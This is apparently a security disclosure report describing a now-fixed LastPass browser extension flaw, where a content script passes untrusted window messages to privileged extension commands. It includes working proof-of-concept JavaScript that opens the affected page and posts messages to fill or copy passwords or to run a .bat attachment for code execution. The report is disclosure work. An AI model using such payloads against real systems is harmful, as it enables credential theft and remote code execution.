I noticed this entry in the content_script array from the LastPass manifest:
{
"matches": [
"https://1min-ui-prod.service.lastpass.com/*"
],
"js": [
"1minsignup/chrome/websiteConnector.js"
],
"all_frames": true,
"run_at": "document_end"
},
That's a content script that is only used for one specific lastpass.com domain, if we look at the script:
$ uglifyjs --beautify < 1minsignup/chrome/websiteConnector.js
...
window.addEventListener("message", function(e) {
e.data.fromExtension || chrome.runtime.sendMessage(e.data, function(e) {});
});
That doesn't look good, this script will proxy unauthenticated window messages to the extension. This is clearly a mistake, because anybody can do
win = window.open("https://1min-ui-prod.service.lastpass.com/");
win.postMessage({}, "*");
Therefore, this allows complete access to internal privileged LastPass RPC commands. There are hundreds of internal LastPass RPCs, but the obviously bad ones are things copying and filling in passwords (copypass, fillform, etc). If you install the binary component (https://lastpass.com/support.php?cmd=showfaq&id=5576), you can also use "openattach" to run arbitrary code.
For example, this will run calc.exe:
win = window.open("https://1min-ui-prod.service.lastpass.com/");
win.postMessage({fromExtension: false, cmd: "openattach", attachkey: "d44479a4ce97554c24399f651ca76899179dec81c854b38ef2389c3185ae8eec", data: "!8uK7g5j8Eq08Nr86mhmMxw==|1dSN0jXZSQ51V1ww9rk4DQ==", mimetype: "other:.bat"}, "*");
(This code will need to be inside an onclick handler to open a popup).
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.
↧
LastPass RCE vulnerability fixed
↧